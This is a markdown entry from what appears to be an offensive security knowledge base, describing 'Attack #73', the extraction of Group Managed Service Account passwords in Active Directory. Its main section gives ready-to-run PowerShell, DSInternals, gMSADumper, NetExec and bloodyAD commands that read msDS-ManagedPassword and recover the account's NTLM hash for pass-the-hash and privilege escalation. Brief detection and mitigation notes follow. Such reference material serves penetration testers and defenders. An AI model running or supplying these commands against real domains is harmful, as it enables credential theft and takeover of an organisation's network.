attack-73-gmsa-password-extraction.md (4074B)
1 --- 2 title: "Attack #73 β gMSA Password Extraction" 3 description: "Group Managed Service Accounts (gMSAs) have their passwords automatically managed by AD and stored in the msDS-ManagedPassword attribute. Principalsβ¦" 4 category: active-directory 5 subcategory: "Advanced & Post-Exploitation" 6 tags: ["active-directory", "credential-access", "ntlm", "privilege-escalation", "hashing"] 7 tools: ["NetExec", "PowerShell"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/AD-Attack/Category-Ten/π· Attack #73 β gMSA Password Extraction.md" 11 --- 12 # π· Attack #73 β gMSA Password Extraction 13 14 *** 15 16 ## π How It Works 17 18 Group Managed Service Accounts (gMSAs) have their passwords automatically managed by AD and stored in the `msDS-ManagedPassword` attribute. Principals authorized to retrieve this password (defined in `msDS-GroupMSAMembership`) can extract the NTLM hash of the gMSA. If a gMSA has privileged access (e.g., DA-equivalent or DCSync rights), extracting its hash = domain compromise. 19 20 *** 21 22 ## βοΈ Prerequisites 23 24 | Requirement | Detail | 25 |---|---| 26 | **Authorized to retrieve gMSA password** | Listed in `msDS-GroupMSAMembership` | 27 | **Or compromise of an authorized server** | Servers hosting services running as gMSA | 28 29 *** 30 31 ## π» Full Commands 32 33 ```powershell 34 # ββ Find gMSAs ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ 35 Get-ADServiceAccount -Filter * -Properties PrincipalsAllowedToRetrieveManagedPassword 36 37 # ββ Check who can read gMSA password ββββββββββββββββββββββββββββββββββββββββββ 38 Get-ADServiceAccount svc_gmsa -Properties PrincipalsAllowedToRetrieveManagedPassword | 39 Select PrincipalsAllowedToRetrieveManagedPassword 40 41 # ββ Read gMSA password (if authorized) ββββββββββββββββββββββββββββββββββββββββ 42 # DSInternals: 43 Install-Module DSInternals -Force 44 $gmsa = Get-ADServiceAccount svc_gmsa -Properties msDS-ManagedPassword 45 (ConvertFrom-ADManagedPasswordBlob $gmsa.'msDS-ManagedPassword').SecureCurrentPassword 46 47 # ββ GMSAPasswordReader (tool) βββββββββββββββββββββββββββββββββββββββββββββββββ 48 .\GMSAPasswordReader.exe --AccountName svc_gmsa 49 ``` 50 51 ```bash 52 # ββ gMSADumper (Linux) ββββββββββββββββββββββββββββββββββββββββββββββββββββββββ 53 python3 gMSADumper.py -u low_user -p 'Password1' -d corp.local -l DC01.corp.local 54 55 # ββ NetExec βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ 56 nxc ldap DC01.corp.local -u low_user -p 'Password1' --gmsa 57 58 # ββ bloodyAD ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ 59 bloodyAD -d corp.local -u low_user -p 'Password1' --host DC01.corp.local \ 60 get object 'svc_gmsa$' --attr msDS-ManagedPassword 61 ``` 62 63 *** 64 65 ## π‘οΈ Detection β Event IDs 66 67 | Event ID | Source | What to Look For | 68 |---|---|---| 69 | **4662** | Security Log (DC) | Read access to `msDS-ManagedPassword` attribute | 70 71 *** 72 73 ## π Attack Chain Context 74 75 ``` 76 [gMSA] βββ Extract managed password hash β impersonate service account 77 β 78 ββββ π gMSA may have DA-equivalent rights or DCSync permissions 79 ββββ π PtH with gMSA hash β lateral movement / privilege escalation 80 ββββ π Defeated by: restrict gMSA password retrieval delegation 81 ``` 82 83 *** 84 85 > β **Attack #73 β gMSA Password Extraction complete.**